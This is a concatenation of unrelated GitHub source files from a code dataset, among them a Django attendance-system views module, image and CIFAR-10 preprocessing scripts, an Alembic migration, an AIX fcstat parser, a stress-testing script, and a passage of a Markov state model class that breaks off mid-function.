[1,2]\n else:\n return [3,4,5,6,7,8]\n\n\ndef _get_course_map(allotment_filter):\n course_map_list = list()\n if allotment_filter is None:\n return course_map_list\n else:\n for allotment_obj in allotment_filter:\n course_obj = allotment_obj.course_code\n course_code = course_obj.course_code\n course_title = course_obj.title\n faculty_name = allotment_obj.faculty_id.name\n course_map_list.append({'code':course_code, 'title':course_title, 'faculty':faculty_name})\n return course_map_list\n\n\ndef _get_semesters_filter(request, selected=None):\n current_hod = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=current_hod).department\n semesters = dict()\n if selected is None:\n selected = '_____'\n if department == 'SH':\n for semester in range(1,3):\n if selected == str(semester):\n semesters[semester] = True\n else:\n semesters[semester] = False\n else:\n for semester in range(3,9):\n if selected == str(semester):\n semesters[semester] = True\n else:\n semesters[semester] = False\n return semesters\n\n\ndef _get_batches_filter(selected=None):\n batches_list = list(Course_allot.objects.values_list('year', flat=True).distinct())\n batches = dict()\n for batch in batches_list:\n if selected != batch:\n batches[batch] = False\n else:\n batches[batch] = True\n return batches\n\n# Below function seems to be useless\ndef _get_course_filter(request, selected=None, semester=None):\n current_hod = request.session.get('username')\n department = Hod_credential.objects.get(hod_id=current_hod).department\n if semester is None:\n return []\n try:\n course_codes = str(Semester_wise_course.objects.get(department=department, semester=semester).courses).split('-')\n except Semester_wise_course.DoesNotExist:\n return []\n\n course_filter = []\n for course_code in course_codes:\n course_title = Course.objects.get(course_code=course_code).title\n if course_code != selected:\n course_filter.append({'code':course_code, 'title':course_title, 'checked':False})\n else:\n course_filter.append({'code':course_code, 'title':course_title, 'checked':True})\n \n return course_filter\n \n\ndef _get_attendance_data_for_batch(department, batch=None, semester=None):\n if semester is None or batch is None:\n 
return dict()\n else:\n semester = int(semester)\n try:\n course_year = str(int(batch) + semester // 2)\n courses = Semester_wise_course.objects.get(department=department, semester=semester).courses.split('-')\n if int(semester) > 4:\n try:\n courses += Semester_wise_electives.objects.get(department=department, semester=semester, year=course_year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n students = list(StudentProfile.objects.filter(reg_no__startswith=batch).values_list('reg_no', flat=True).order_by('reg_no'))\n except Semester_wise_course.DoesNotExist:\n return dict()\n except StudentProfile.DoesNotExist:\n return dict()\n attendance_data = dict()\n student_attendance_list = []\n \n for reg_no in students:\n percent_list = []\n nocourse = True\n for course_code in courses:\n total = attendance.objects.filter(reg_no=reg_no, course_code=course_code).aggregate(total_classes=Sum('no_of_classes')).get('total_classes')\n total = total if total is not None else 0\n present = attendance.objects.filter(reg_no=reg_no, course_code=course_code, attendance='P').aggregate(classes_present=Sum('no_of_classes')).get('classes_present')\n present = present if present is not None else 0\n if total != 0:\n nocourse = False\n percent_present = (present/total)*100\n percent_list.append(percent_present)\n else:\n percent_list.append(0.0)\n if nocourse:\n return dict()\n student_attendance_list.append({'reg_no':reg_no, 'percent':percent_list})\n attendance_data['courses'] = courses\n attendance_data['students'] = student_attendance_list\n\n return attendance_data\n\n\ndef _get_attendance_data_for_student(student_profile):\n data = dict()\n this_semester = (date.today().year - int(student_profile.reg_no[:4]))*2\n if date.today().month >= 7:\n this_semester += 1\n \n data['reg_no'] = student_profile.reg_no\n data['stu_name'] = student_profile.name\n\n if this_semester % 2 == 0:\n data['min_date'] = date(date.today().year, 1, 1).strftime('%Y-%m-%d')\n data['max_date'] = date(date.today().year, 6, 30).strftime('%Y-%m-%d')\n else:\n data['min_date'] = date(date.today().year, 7, 1).strftime('%Y-%m-%d')\n data['max_date'] = date(date.today().year, 12, 31).strftime('%Y-%m-%d')\n \n att_data_list = list()\n course_year = str(date.today().year)\n courses = Semester_wise_course.objects.get(department=student_profile.department, semester=this_semester).courses.split('-')\n if this_semester > 4:\n try:\n courses += Semester_wise_electives.objects.get(department=student_profile.department, semester=this_semester, year=course_year).elective_courses.split('-')\n except Semester_wise_electives.DoesNotExist:\n pass\n \n for course_code in courses:\n total = attendance.objects.filter(reg_no=student_profile, course_code=course_code).aggregate(total_classes=Sum('no_of_classes')).get('total_classes')\n total = total if total is not None else 0\n present = attendance.objects.filter(reg_no=student_profile, course_code=course_code, attendance='P').aggregate(classes_present=Sum('no_of_classes')).get('classes_present')\n present = present if present is not None else 0\n if total != 0:\n percent_present = (present/total)*100\n else:\n percent_present = 0.0 \n att_data_list.append(percent_present)\n \n data['courses'] = courses\n data['percentages'] = att_data_list\n return data\n\n\ndef _modify_attendance_for_student(reg_no, start_date, end_date):\n attendance_filter = attendance.objects.filter(reg_no=reg_no, date__range=[start_date, end_date])\n if attendance_filter is None:\n return False\n for 
attendance_ins in attendance_filter:\n attendance_ins.attendance = 'P'\n attendance_ins.if_mod = True\n attendance_ins.save()\n return True\n\n\ndef _parse_course_mapping(request):\n course_map = dict()\n for key, value in request.POST.items():\n if key.startswith('course_'):\n course_map[key[7:]] = value\n return course_map\n\n# AUTHENTICATION FUNCTIONS WRITTEN BELOW\n\ndef hod_login(request):\n request.session['username'] = request.POST.get('username')\n request.session['logged'] = True\n request.session['user_type'] = 'HOD'\n\n\ndef authenticate(username=None, password=None):\n if username is None or password is None:\n return False\n try:\n hod_ins = Hod_credential.objects.get(hod_id=username)\n except Hod_credential.DoesNotExist:\n return False\n if hod_ins is not None:\n if password == hod_ins.password:\n return True\n else:\n return False\n else:\n return False\n\n\ndef _hod_is_logged(request):\n if request.session.get('logged'):\n user_type = request.session.get('user_type')\n if user_type != 'HOD':\n return False\n else:\n return True\n else:\n return False\n\n\ndef hod_logout(request):\n request.session.clear()\n return redirect('hod_index')","repo_name":"anandubey/projectAMS","sub_path":"HOD/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":20785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"71183435524","text":"import numpy as np\nimport pickle\nimport random\nimport os\nimport cv2\n\n# this is where you store your datasets for this project\nDataDir = \"G:\\AI\\Dog-or-Cat-Datasets\"\nCategories = [\"Dog\",\"Cat\"]\n\n# read the images with labels as arrays for later\ntraining_data = []\nimage_size = 70\ndef pre_process_Data():\n for Category in Categories:\n # class_name = Categories.index(Category)\n if Category == \"Dog\":\n label = 0\n else:\n label = 1\n path = os.path.join(DataDir,Category)\n for img in os.listdir(path):\n try: \n img_array = cv2.imread(os.path.join(path, img))\n img_array = np.array(img_array)\n img_array = cv2.resize(img_array,(image_size, image_size))\n img_array = img_array/255.0 #normalization\n training_data.append((img_array, label))\n except Exception as e:\n pass\n\nn=pre_process_Data()\n\n# Save the datasets we processed and divide it into two parts(one for training,one for testing)\nrandom.shuffle(training_data)\nx, y = [], []\nfor img,label in training_data:\n x.append(img)\n y.append(label)\nx = np.array(x)\nx_train = x[:20000]\ny_train = y[:20000]\nx_test = x[20000:]\ny_test = y[20000:]\n\n#save data for trainning\npickle_out = open(\"x_train.pickle\",\"wb\")\npickle.dump(x_train, pickle_out)\npickle_out.close()\n\npickle_out = open(\"y_train.pickle\",\"wb\")\npickle.dump(y_train, pickle_out)\npickle_out.close()\n\npickle_out = open(\"x_test.pickle\",\"wb\")\npickle.dump(x_test, pickle_out)\npickle_out.close()\n\npickle_out = open(\"y_test.pickle\",\"wb\")\npickle.dump(y_test, pickle_out)\npickle_out.close()\n\n\n","repo_name":"harlan-zhao/Dog-or-Cat","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"33564439954","text":"\"\"\"reported table\n\nRevision ID: cbb52787c330\nRevises: c7acbb09501c\nCreate Date: 2019-12-18 19:31:47.352000\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'cbb52787c330'\ndown_revision = 
'c7acbb09501c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('reporters',\n sa.Column('reporter_id', sa.Integer(), nullable=True),\n sa.Column('reported_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['reported_id'], ['status.id'], ),\n sa.ForeignKeyConstraint(['reporter_id'], ['user.id'], )\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('reporters')\n # ### end Alembic commands ###\n","repo_name":"jeffreycharters/radriders-real","sub_path":"migrations/versions/cbb52787c330_reported_table.py","file_name":"cbb52787c330_reported_table.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19226592053","text":"import json\n\nfrom analysingstream.processors.message import Message\n\n\nclass MessageSerializer:\n @staticmethod\n def serialize(msg):\n content = {\n \"payload\": msg.payload,\n \"correlationId\": msg.id.__dict__,\n }\n return json.dumps(content).encode()\n\n @staticmethod\n def deserialize(msg):\n msg = json.loads(msg.decode())\n return Message(msg[\"correlationId\"], msg[\"payload\"])\n","repo_name":"lffsantos/analysing_streaming","sub_path":"analysingstream/processors/serializer.py","file_name":"serializer.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70258896645","text":"# Compute the factorial\n# Write a function that receives a number n and returns the value of n! = 1 ⋅ 2 ⋅ 3 ⋅ ⋯ ⋅ n.\n# Your function must be named `fatorial`.\n\ndef fatorial (n):\n result = 1\n \n while n > 1:\n result *= n\n n -= 1\n \n return result\n","repo_name":"FelixLuciano/Elements-of-Software-Design","sub_path":"source/36-Calcula_fatorial.py","file_name":"36-Calcula_fatorial.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"10692739235","text":"#!/opt/freeware/bin/python3\n\n# All imports used\nfrom .Stats_Parser import StatsParser\nfrom . 
import avg_list, debug_post_msg, pq_round_number, line_cleanup, try_conv_complex\nimport datetime\n\nclass parser(StatsParser) :\n def __init__(self, logger = None, samples = 2, interval = 1, cwd = '/tmp', bos_data = None) :\n super().__init__(logger = logger, cwd = cwd, bos_data=bos_data)\n\n self.file_sources = { 'fcstat' : self.parse_fcstat_e_from_dict }\n # Internal list to hold all keys used when parsing stats data\n self.data['stats'] = {}\n\n return(None)\n\n#######################################################################################################################\n def update_commands(self) :\n '''\n Update commands and functions dict\n '''\n try :\n # In case self.commands and self.functions hasn't been populated yet\n if self.bos_data.data['bos']['os'] == \"aix\" :\n for dev in self.bos_data['dev_class']['adapter'] :\n if 'fcs' in dev :\n key = 'stats_%s'%dev\n self.commands['aix'][key] = \"fcstat -e %s\"%dev\n self.functions['aix'][key] = self.parse_fcstat_stats\n except Exception as e :\n debug_post_msg(self.logger,\n 'Error loading device specific commands, possibly bos_data not initialized : %s'%e,\n raise_type=Exception)\n\n\n return(None)\n\n\n#######################################################################################################################\n def get_measurements(self, elements = [ 'stats' ], consolidate_function = avg_list, update_from_system:bool=True) :\n ret = []\n cur_time = datetime.datetime.utcnow().isoformat()\n if update_from_system :\n self.update_from_system(elements = elements)\n\n for adpt,adpt_data in self.data['stats'].items() :\n try :\n tmp_dct = {}\n for i in [ 'transmit_frames', 'receive_frames', 'transmit_words', 'receive_words', 'lip_count', 'nos_count',\n 'error_frames', 'dumped_frames', 'link_failure_count', 'loss_of_sync_count', 'loss_of_signal',\n 'primitive_seq_protocol_error_count', 'invalid_tx_word_count', 'invalid_crc_count' ] :\n tmp_dct[i] = adpt_data[i]\n ret.append({'measurement' : 'fcstat_general',\n 'tags' : { 'host' : self.bos_data['bos']['hostname'], 'adapter' : adpt },\n 'fields' : tmp_dct,\n 'time' : cur_time })\n for i in 'fc_scsi_adapter_driver_information', 'fc_scsi_traffic_statistics' :\n ret.append({'measurement' : 'fcstat_%s'%i,\n 'tags' : { 'host' : self.bos_data['bos']['hostname'], 'adapter' : adpt },\n 'fields' : adpt_data[i],\n 'time' : cur_time })\n except Exception as e :\n debug_post_msg('Error parsing fcstat data: %s'%e)\n return(ret)\n\n\n#######################################################################################################################\n def parse_fcstat_e_from_dict(self, data:dict) :\n for adapter,adapter_data in data.items() :\n self.parse_fcstat_stats(adapter_data.split('\\n'))\n return(None)\n\n\n#######################################################################################################################\n def parse_fcstat_stats(self, data:list) :\n ret = {}\n lns = []\n adapter = ''\n inner_key = ''\n\n def __str_fix__(st:str) :\n '''\n Inner function to handle string cleanup\n '''\n rt = st.lower().strip(' ')\n for i in [ (' ', '_'), ('/', '_'), (',','.'), ('%',''), ('(', '_'), (')', '_') ] :\n rt = rt.replace(i[0],i[1])\n rt.strip('_')\n return(rt)\n\n for dt in data :\n if dt.count('\\n') > 1 :\n lns += dt.split('\\n')\n else :\n lns += [ dt ]\n for dt in line_cleanup(data, split=True, delimiter=':', cleanup=True, remove_endln=True) :\n if len(dt) == 1 :\n if dt[0] in [ 'FC SCSI Adapter Driver Information',\n 'FC SCSI Traffic Statistics' ] :\n 
inner_key = __str_fix__(dt[0])\n ret[adapter][inner_key] = {}\n if len(dt) == 2 :\n key = __str_fix__(dt[0])\n value = __str_fix__(dt[1])\n\n if len(value) > 0 :\n if 'FIBRE CHANNEL STATISTICS REPORT' in dt[0] :\n adapter = dt[1].strip()\n inner_key = ''\n ret[adapter] = {}\n elif dt[0] in [ 'Frames', 'Words' ] :\n i_dt = dt[1].strip().split(' ')\n k_0 = 'transmit_%s'%(__str_fix__(dt[0]))\n k_1 = 'receive_%s'%(__str_fix__(dt[0]))\n ret[adapter][k_0] = try_conv_complex(i_dt[0])\n ret[adapter][k_1] = try_conv_complex(i_dt[1])\n elif len(inner_key) > 0 :\n ret[adapter][inner_key][key] = try_conv_complex(value)\n else :\n ret[adapter][key] = try_conv_complex(value)\n self.data['stats'].update(ret)\n return(ret)\n\n\n#######################################################################################################################\n","repo_name":"pslq/checklist","sub_path":"pq_checklist/fcstat.py","file_name":"fcstat.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"7490487844","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2019/12/24 11:50\n# @Author : Leslee\n\"\"\"\nBest practices for reading the CIFAR-10 dataset\n1. Build the list of file names and read it directly.\n2. Build the file name queue with tf.train.string_input_producer\n3. Create the reader and decoder; in the decoder, reshape the image to the model's input shape\n4. Build the example queue\n\n\"\"\"\nimport tensorflow as tf\n\nLABEL_BYTES = 1\nIMAGE_SIZE = 32\nIMAGE_IMAGE_DEPTH = 3\n\nIMAGE_BYTES = IMAGE_SIZE * IMAGE_SIZE * IMAGE_IMAGE_DEPTH\nNUM_CLASSES = 10\n\ndef read_cifar10(data_file,batch_size):\n \"\"\"\n :param data_file: data file\n :param batch_size:\n :return:\n images:[batch_size,image_size,image_size,3] batch of images\n labels:[batch_size,NUM_CLASSES]\n \"\"\"\n # number of bytes per record\n record_bytes = LABEL_BYTES + IMAGE_BYTES\n # build the list of file names\n data_files = tf.gfile.Glob(data_file)\n # build the file name queue\n file_queue = tf.train.string_input_producer(data_files,shuffle=True)\n\n # create the reader for the binary files\n reader = tf.FixedLengthRecordReader(record_bytes=record_bytes)\n _,value = reader.read(file_queue)\n # split each record into label and image\n record = tf.reshape(tf.decode_raw(value,tf.uint8),[record_bytes])\n label = tf.cast(tf.slice(record,[0],[LABEL_BYTES]),tf.int32)\n # convert [depth*height*width] into a [depth,height,width] image Tensor\n depth_major = tf.reshape(tf.slice(record,[LABEL_BYTES],[IMAGE_BYTES]),\n [IMAGE_IMAGE_DEPTH,IMAGE_SIZE,IMAGE_SIZE])\n # shape\n image = tf.cast(tf.transpose(depth_major,[1,2,0]),tf.float32)\n\n # build the example queue: initialize a random shuffle queue with the given parameters\n example_queue = tf.RandomShuffleQueue(\n capacity=16*batch_size,\n min_after_dequeue=8*batch_size,\n dtypes=[tf.float32,tf.int32],\n shapes=[[IMAGE_SIZE,IMAGE_SIZE,IMAGE_IMAGE_DEPTH],[1]])\n num_threads = 16\n # create the enqueue op for the example queue\n example_enqueue_op = example_queue.enqueue([image,label])\n # add all 16 defined threads to the queue runner\n tf.train.add_queue_runner(tf.train.queue_runner.QueueRunner(\n example_queue,[example_enqueue_op] *num_threads))\n # dequeue batch_size examples at a time\n images, labels = example_queue.dequeue_many(batch_size)\n labels = tf.reshape(labels,[batch_size,1])\n indices = tf.reshape(tf.range(0,batch_size,1),[batch_size,1])\n labels = tf.sparse_to_dense(\n tf.concat(values=[indices,labels],axis=1),\n [batch_size,NUM_CLASSES],1.0,0.0)\n return images,labels\n\ndata_file = \"E:/PythonProject/data/tflearn/cifar-10-batches-py/data_batch_*\"\nimg,lab = 
read_cifar10(data_file,32)\nprint(img,lab)\n\n\n","repo_name":"SCismycat/TensorFlowLearning","sub_path":"tensorflow4book2/Section3_DataFlow/do_CIFAR10.py","file_name":"do_CIFAR10.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"14071045651","text":"# Libraries\n\nimport os\nfrom termcolor import cprint\n\nfrom config import *\n\n\ndef neutral(text=\"\", end=\"\\n\"):\n cprint(text, \"white\", end=end)\n\n\ndef info(text=\"\", end=\"\\n\"):\n cprint(text, \"blue\", end=end)\n\n\ndef success(text=\"\", end=\"\\n\"):\n cprint(text, \"green\", end=end)\n\n\ndef warning(text=\"\", end=\"\\n\"):\n cprint(text, \"yellow\", end=end)\n\n\ndef error(text=\"\", end=\"\\n\"):\n cprint(text, \"red\", end=end)\n\n\ndef run(command):\n if os.system(command) != 0:\n exit(3)\n\n\ndef try_run(command):\n return os.system(command)\n\n\ndef print_file(path):\n f = open(path, \"r\")\n for s in f.readlines():\n neutral(s, end=\"\")\n neutral()\n f.close()\n\nif IGNORE_WRONG_ANSWER:\n warning(\"Stress ignores verdict \\\"Wrong answer\\\"\")\n\n# Compiling\n\ninfo(\"Compiling generator...\")\nif try_run(GEN_COMPILE) != 0:\n error(\"Generator compilation failed\")\n exit(3)\nsuccess(\"Generator compilation finished\")\n\ninfo(\"Compiling solution...\")\nif try_run(SOLUTION_COMPILE) != 0:\n error(\"Solution compilation failed\")\n exit(3)\nsuccess(\"Solution compilation finished\")\n\ninfo(\"Compiling correct solution...\")\nif try_run(CORRECT_SOLUTION_COMPILE) != 0:\n error(\"Correct solution compilation failed\")\n exit(3)\nsuccess(\"Correct solution compilation finished\")\n\n# Testing\n\ncnt = 1\nwhile True:\n warning(f\"Test {cnt}: \", end=\"\")\n\n if try_run(GEN_RUN + f\" > {WORKING_DIRECTORY}input.txt\") != 0:\n error(\"Generator runtime error\")\n exit(3)\n\n if try_run(SOLUTION_RUN + f\" < \\\"{WORKING_DIRECTORY}input.txt\\\"\" +\n f\" > \\\"{WORKING_DIRECTORY}output.txt\\\"\") != 0:\n error(\"Runtime error\")\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n exit(0)\n\n if try_run(CORRECT_SOLUTION_RUN + f\" < \\\"{WORKING_DIRECTORY}input.txt\\\"\" +\n f\" > \\\"{WORKING_DIRECTORY}answer.txt\\\"\") != 0:\n error(\"Correct solution runtime error\")\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n exit(3)\n\n if (not IGNORE_WRONG_ANSWER) and (\n try_run(f\"cmp {WORKING_DIRECTORY}output.txt {WORKING_DIRECTORY}answer.txt --silent\") != 0):\n error(\"Wrong answer\")\n\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n\n info(\"Solution output:\")\n print_file(f\"{WORKING_DIRECTORY}output.txt\")\n\n info(\"Answer:\")\n print_file(f\"{WORKING_DIRECTORY}answer.txt\")\n exit(0)\n\n success(\"OK\")\n\n if PRINT_PASSED_TESTS:\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n\n info(\"Answer:\")\n print_file(f\"{WORKING_DIRECTORY}answer.txt\")\n\n cnt += 1\n","repo_name":"molney239/competitive","sub_path":"stress/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"2910310992","text":"'''\nThis file contains the class definition for my custom MSM class. \n\nUnlike pyEMMA, my version does not compute the connected set of the underlying\ntransition matrix before doing the estimation. It uses the full state space of \nobserved transitions. 
There are however, parameters to cut out particular states\nand transitions based on a supplied minimum count number. I have set the defaults \nto what I have found works best. \n\nTo construct MSMs, I...\n1) Compute count matrix from a list of discrete trajectories\n2) Cut out states according to minimum count thresholds\n3) Normalize into a probability transition matrix by computing row sums\n4) Compute a reduced representation only over the active states in the system\n5) Compute absorbing sets (only if requested), this takes some time.\n\nI then provide methods for solving the forward equation, computing eigenvalues, \nand computing implied timescales. \n\nThe rest of the file contains functions for taking in trajectory data, converting to\ndiscrete trajectories according to the supplied state definitions, and computing MSMs\nas well as analyzing them. \n'''\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport os\nimport fnmatch\nimport glob\nimport itertools\nimport random\n\nimport pickle\n\nimport scipy\nimport scipy.io\nimport scipy.sparse\nimport scipy.sparse.linalg\n\nfrom scipy.sparse import dok_matrix\nfrom collections import defaultdict\n\nimport warnings\n\n\n\n##################################################################\n############# MSM Class Functions ###############################\n##################################################################\n\nclass MSM:\n\n #class methods\n def __init__(self, dtrajs, lag, Eh, Ep, num_states, min_count=1, min_frame=2, \n absorbingSets = False):\n #set all the input parameters, make count matrix, and probability matrix\n\n #init parameters that do not get set by MSM computation routines\n self.timescales = []\n self.absorbing = set()\n self.absorbing_active = set()\n\n #set the id parameters \n self.lag = int(lag)\n self.Eh = Eh\n self.Ep = Ep\n\n #set cutoff parameters\n self.min_count = int(min_count)\n self.min_frame = int(min_frame)\n\n #init the sparse matrix storage\n self.num_states = num_states\n self.count_matrix = scipy.sparse.dok_matrix((num_states, num_states), dtype=int)\n self.P = scipy.sparse.csr_matrix((num_states, num_states), dtype=float)\n self.row_counts = np.zeros(num_states, dtype=float)\n\n #init state info lists\n self.active_set = []\n self.inactive = []\n self.col_rem = []\n\n #init the sparse matrix storage for active states\n self.num_states_active = 0\n self.count_matrix_active = []\n self.P_active = []\n self.row_counts_active = []\n self.fullToNew = np.zeros(num_states, dtype=int)\n\n #print a start message\n print(\"Estimating Markov Model\")\n\n #compute the count matrix using dtraj data\n self.constructCountMatrix(dtrajs)\n print(\"Count Matrix Constructed\")\n print(\"Total Counts = {}\".format(self.row_counts.sum()))\n\n #apply cutoffs for frame and transition counts\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') #sparse efficiency warning, cant be avoided\n self.applyCutoffs()\n print(\"Cutoffs Applied:\")\n print(\"Min Transitions = {}, Min Frames = {}\".format(self.min_count, self.min_frame))\n\n #determine inactive state\n self.findInactive()\n print(\"Inactive States have been identified\")\n\n #get the transition matrix\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') #divide by 0 warning, fine b/c those rows are purged later\n self.getProbabilityMatrix()\n print(\"Rows re-normalized into a probability matrix\")\n\n #compute a reduced representation over the active set\n self.computeActive()\n print(\"A reduced 
transition matrix has been constructed over the active set\")\n\n #determine absorbing sets if requested\n if (absorbingSets):\n print(\"Identifying Absorbing states by repeated squaring\")\n self.findAbsorbing()\n print('Absorbing States have been identified')\n\n def applyCutoffs(self):\n #apply the two cutoffs to the count matrix\n\n #remove rows with little sampling and transitions with few counts\n for i in range(self.num_states):\n #set states below min_count to 0\n r = self.count_matrix.getrow(i)\n nonzero_mask = np.array(r[r.nonzero()] < self.min_count)\n if nonzero_mask.size > 1:\n idx = r.nonzero()[1][nonzero_mask[0]]\n self.count_matrix[i,idx] = 0\n\n #set rows with few frames to zero\n r = self.count_matrix.getrow(i)\n if (r.sum() < self.min_frame):\n idx = r.nonzero()[1]\n self.count_matrix[i,idx] = 0\n self.col_rem.append(i)\n \n\n #remove all column entries corresponding to removed rows\n for i in self.col_rem:\n c = self.count_matrix.getcol(i)\n idx = c.nonzero()[0]\n if (len(idx)) > 0:\n #print(\"Removing {} entries from column {}\".format(len(idx),i))\n self.count_matrix[idx,i] = 0\n\n\n #change the sparsity structure (removes memory for all 0 entries)\n self.count_matrix.eliminate_zeros()\n\n #get the new number of counts in each row of the matrix for normalization\n self.row_counts = np.asarray(self.count_matrix.sum(axis=1)).squeeze()\n\n def constructCountMatrix(self, dtrajs):\n #construct the count matrix using the given trajectories and parameters\n\n '''\n for speed, store (i,j) pairs as keys in a dict, create matrix from there\n '''\n\n matrix_dict = defaultdict(int)\n\n #loop over each path in dtrajs\n for path in dtrajs:\n\n #loop over all entries in the path, get transition for i+lag\n for i in range(len(path)-self.lag):\n\n #get a transition from frame i to i+lag\n state1 = path[i]\n state2 = path[i+self.lag]\n\n #update the count dict\n matrix_dict[state1, state2] += 1\n\n #use the dict to set the matrix\n dict.update(self.count_matrix, matrix_dict)\n\n #convert to csr\n self.count_matrix = self.count_matrix.tocsr()\n\n #get row counts\n self.row_counts = np.asarray(self.count_matrix.sum(axis=1)).squeeze()\n\n def getProbabilityMatrix(self):\n #use the count matrix and counts to get a normalized probability matrix\n\n #create a sparse matrix with reciprocal rows sums on the diagonal\n c = scipy.sparse.diags(1/self.row_counts.ravel())\n\n #empty rows will get an inf. Set these to zero and log them as inactive\n find_inf = scipy.sparse.find(c > 1)[0]\n c.tocsr()\n c.data[0][find_inf] = 0\n \n #compute dot product to get PTM\n self.P = c.dot(self.count_matrix)\n diagonal = self.P.diagonal()\n\n #check which rows have no entries, set diag to 1 there\n for i in range(self.num_states):\n r = self.P.getrow(i)\n if (r.sum() < 1e-4):\n diagonal[i] = 1.0\n\n self.P.setdiag(diagonal)\n\n def findInactive(self):\n #determine inactive states in transition matrix\n\n #print info message to user\n print(\"Performing passes over the states to determine inactive states\")\n\n #perform 100 attempts. 
should be sufficient for even large systems\n for attempt in range(100):\n\n #init an identified list to store which inactive states are found each attempt\n identified = []\n for i in range(self.num_states):\n if i not in self.inactive:\n\n #check if the i-th row has no entries\n cr = self.count_matrix.getrow(i)\n if cr.sum() < self.min_frame:\n\n #add to lists -> inactive, remove column, identified\n self.inactive.append(i)\n self.col_rem.append(i)\n identified.append(i)\n\n #get the column for the inactive state and remove transitions to it\n c = self.count_matrix.getcol(i)\n idx = c.nonzero()[0]\n if (len(idx)) > 0:\n print(\"Removing {} entries from column {}\".format(len(idx),i))\n self.count_matrix[idx,i] = 0\n\n #print out how many inactive states were identified this pass\n print(\"Pass {} identified {} inactive states\".format(attempt, len(identified)))\n\n #if no new states found, we are done\n if (len(identified)) == 0:\n return\n\n return\n\n\n def computeActive(self):\n #compute count and transition matrices over the active set\n\n #compute the active set by removing inactive states\n self.active_set = list(set(range(self.num_states)) - set(self.inactive))\n self.num_states_active = len(self.active_set)\n nsa = self.num_states_active\n\n #compute a map from full index to active index\n for full_state in range(self.num_states):\n try:\n new_index = self.active_set.index(full_state)\n except:\n new_index = -1\n self.fullToNew[full_state] = new_index\n\n #init the dok matrix for the reduced count matrix\n self.count_matrix_active = scipy.sparse.dok_matrix((nsa, nsa), dtype=int)\n\n #build the dok matrix entry by entry\n for active_state in range(nsa):\n\n #convert the active state index to full state index\n fsi = self.active_set[active_state]\n\n #get the nonzeros in the full count matrix row\n r = self.count_matrix.getrow(fsi).nonzero()[1]\n\n #iterate over each, check if the state is in active set, append entry\n for full_state in r:\n new_index = self.fullToNew[full_state]\n if new_index > -1:\n count = self.count_matrix[fsi,full_state]\n self.count_matrix_active[active_state,new_index] = count\n\n #convert to csr\n self.count_matrix_active = self.count_matrix_active.tocsr()\n\n #get row counts\n self.row_counts_active = np.asarray(self.count_matrix_active.sum(axis=1)).squeeze()\n\n #create a sparse matrix with reciprocal rows sums on the diagonal\n c = scipy.sparse.diags(1.0 / self.row_counts_active.ravel())\n\n #empty rows will get an inf, but there should be none. check this\n find_inf = scipy.sparse.find(c > 1)[0]\n if len(find_inf > 0):\n print(find_inf)\n print(self.count_matrix_active.getrow(find_inf[0]))\n print(\"Warning: An inactive state has survived pruning. Check this manually.\")\n sys.exit()\n\n #convert to csr\n c.tocsr()\n \n #compute dot product to normalize rows and get PTM\n self.P_active = c.dot(self.count_matrix_active)\n\n def findAbsorbing(self):\n #search for an absorbing set by taking powers of the transition matrix\n\n #start by squaring the transition matrix over the active set\n M = self.P_active * self.P_active\n\n #keep squaring the transition matrix to reach stationary distribution\n n = 36 #number of squarings. P_n = P^(2^n)\n for i in range(n):\n #do squaring\n M = M * M\n\n #eliminiate entries sufficiently close to 0\n nonzero_mask = np.array(M.data[M.data.nonzero()] < 1e-5)\n M.data[nonzero_mask] = 0\n M.eliminate_zeros()\n print(\"Transition matrix squared {} times\".format(i+1))\n\n\n #get the first row and its nonzero entries. 
